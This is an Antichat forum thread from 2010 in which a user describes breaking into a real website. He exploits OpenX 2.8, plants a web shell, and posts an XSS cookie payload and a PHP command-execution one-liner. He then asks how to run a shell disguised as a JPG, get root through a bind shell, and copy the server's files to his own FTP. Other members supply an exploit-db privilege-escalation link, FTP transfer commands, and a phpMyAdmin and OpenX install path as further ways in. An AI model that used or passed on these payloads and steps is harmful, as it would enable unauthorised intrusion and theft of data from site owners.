HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 31.07.2010, 18:29
kiberon
Новичок
Регистрация: 06.11.2008
Сообщений: 0
Провел на форуме:
10300

Репутация: 0
По умолчанию

Ребят несколько дней назад через ОпенХ 2.8 уязвимость вошел в админ аккаунт, потом залил шелл. Просидел мой шелл там около 4 дней. )))) Но на 5 день у меня и шелл пропал, и ОпенХ тоже нету и пароль к админ панелью Апача тоже вообщем меня конкретно устранили. Но я не успокоилья, нашел ХСС на сайте. Дело такое, есть поле для ввода всяких мыслей и вырожений, типа "чего я буду делать завтра": - ОТВЕТ: Вас поламаю...))))))) ну и так дали. В поле ввода набрал

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]alert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]cookie[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"][/COLOR][/COLOR
и обламался, потом решил нажать на "Редактировать" ну давай по редоктируем, и опять же набрал тоже самое..и удача, вижу свои кукиси. Сделал рефреш, облом, в место выполнения скрипта показывает текст, опять редактировал, нажал сохранить, и опять скрипт задействовал. Дальше набрал

PHP код:
PHP:
[
COLOR="#000000"]

[COLOR="#0000BB"]"[/COLOR][COLOR="#007700"];

@[/COLOR][COLOR="#0000BB"]system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cmd'[/COLOR][COLOR="#007700"]]);

echo[/
COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]?>

[/COLOR]

[/COLOR] 
Ну после редактирования у меня есть поле для загрузки файла, но.. тут то и дело что ничего и не получилось, опять же как после перезагрузки страници вижу только код (((( ну что поделать дальше?

Ну сильно не пинайте, я еще не вольшебник, я только учусь )))))))))))))))))))))))))))))))))))))
 
Ответить с цитированием

  #2  
Старый 02.08.2010, 13:45
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418

Репутация: 300


Отправить сообщение для Майор с помощью ICQ
По умолчанию

так ничего не понятно, пиши что/куда(в какую форму) ввёл, потом html код страницы что получилась
__________________

md5( icq ) : fd7d5666e3329c168c41dc355c046d22
 
Ответить с цитированием

  #3  
Старый 04.08.2010, 10:35
kiberon
Новичок
Регистрация: 06.11.2008
Сообщений: 0
Провел на форуме:
10300

Репутация: 0
По умолчанию

Простым способом редактирования шелла залил шелл на сервер, но там сервер файл автоматически переименовывает и дает разшерение JPG.

в шелле на первой строке пишу только GIF и сервер глотает его как гифку, а дальше не могу его запустить, потому что имя файла уже типа f_1_4125_13097_20.jpg. Открываю его, показывает отсуствие картинки. Ч то делать, как его запустить дальше?
 
Ответить с цитированием

  #4  
Старый 04.08.2010, 13:13
kiberon
Новичок
Регистрация: 06.11.2008
Сообщений: 0
Провел на форуме:
10300

Репутация: 0
По умолчанию

Так парни, я зашел через бинд шел конектился к порту 9999 но вот правал, у меня права www. uname -a выдал Linux www2.site.com 2.6.18-164.6.1.el5 #1 SMP Tue Oct 27 11:30:06 EDT 2009 i686 i6

86 i386 GNU/Linux

пока експлоит на поднятие прав не могу найти, может есть у кого то? смотрел на http://inj3ct0r.com/ ранный milw0rm но там не могу найти что надо. Поделитесь советом. Мне нужен рут на этом серваке.

Вот еще что, могу ли я через командную страку все что есть на серваке перекинуть мне на фтп?
 
Ответить с цитированием

  #5  
Старый 06.08.2010, 23:39
Chest3r
Новичок
Регистрация: 14.11.2009
Сообщений: 2
Провел на форуме:
7499

Репутация: 0
По умолчанию

Цитата:
Сообщение от kiberon  
kiberon said:
Так парни, я зашел
через бинд шел конектился к порту 9999
но вот правал, у меня права www. uname -a выдал Linux www2.site.com 2.6.18-164.6.1.el5 #1 SMP Tue Oct 27 11:30:06 EDT 2009 i686 i6
86 i386 GNU/Linux
пока експлоит на поднятие прав не могу найти, может есть у кого то? смотрел на http://inj3ct0r.com/ ранный milw0rm
но там не могу найти что надо. Поделитесь советом. Мне нужен рут на этом серваке.
Может этот поможет - http://www.exploit-db.com/exploits/10613/

Цитата:
Сообщение от kiberon  
kiberon said:
Вот еще что, могу ли я через командную страку все что есть на серваке перекинуть мне на фтп?
ftp> help - говорит само за себя

ftp> quit - завершить работу

ftp> bin - установить режим пересылки бинарных файлов

(настоятельно рекомендую)

ftp> cd katalog - перемещаться по "тамошним" каталогам

ftp> ls - выдать "тамошнее" оглавление

ftp> lcd katalog - перемещаться по "здешним" каталогам

ftp> !dir - выдать "здешнее" оглавление

ftp> !ls -al - выдать "здешнее" оглавление

ftp> get file-tam [ file-name-zdes ] - взять файл оттуда

ftp> put file-zdes [ file-name-tam ] - положить файл туда

Подробней тут - Ссылка
 
Ответить с цитированием

  #6  
Старый 11.08.2010, 16:15
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131

Репутация: 74
По умолчанию

Поцаны, а как вы ищите сплойт под конкретное ведро? Какую часть версии вбивать?
 
Ответить с цитированием

  #7  
Старый 12.08.2010, 20:05
RexTiam
Постоянный
Регистрация: 02.11.2009
Сообщений: 341
Провел на форуме:
599124

Репутация: 65
По умолчанию

l00der, Всем вбивать нужно для эффекта нужного)
 
Ответить с цитированием

  #8  
Старый 16.08.2010, 02:19
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
Провел на форуме:
393885

Репутация: 34
По умолчанию

а можно по подробнее про уязвимость openХ 2.8?
 
Ответить с цитированием

  #9  
Старый 16.08.2010, 15:16
kiberon
Новичок
Регистрация: 06.11.2008
Сообщений: 0
Провел на форуме:
10300

Репутация: 0
По умолчанию

Цитата:
Сообщение от Chest3r  
Chest3r said:
Может этот поможет - http://www.exploit-db.com/exploits/10613/
нет, пробовал, выдовал ошибку mmap() типа не вхатает привилегии или че то в этом роде. Мой шелл закрилы, все базы експлоитов пробовал, ничего не помогло. Может я думаю он уже пропатченный? Вот ешил пробовать в эксплоите 10613 в место mmap пробовать mnumap или map, но уже было поздно. У меня больше нету шелла. ОпенХ тоже закрыли, доадались. шас я к ним еще постучусь, нашел phpmyadmin а внем /scripts/setup.php ну пока что не разобрался как залить шелл туда, но думаю с ващей помощью получиться Вот так вот это уже стало дело принципа
 
Ответить с цитированием

  #10  
Старый 16.08.2010, 15:17
kiberon
Новичок
Регистрация: 06.11.2008
Сообщений: 0
Провел на форуме:
10300

Репутация: 0
По умолчанию

Цитата:
Сообщение от RazyKK  
RazyKK said:
а можно по подробнее про уязвимость openХ 2.8?
site.com/admin/install.php
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ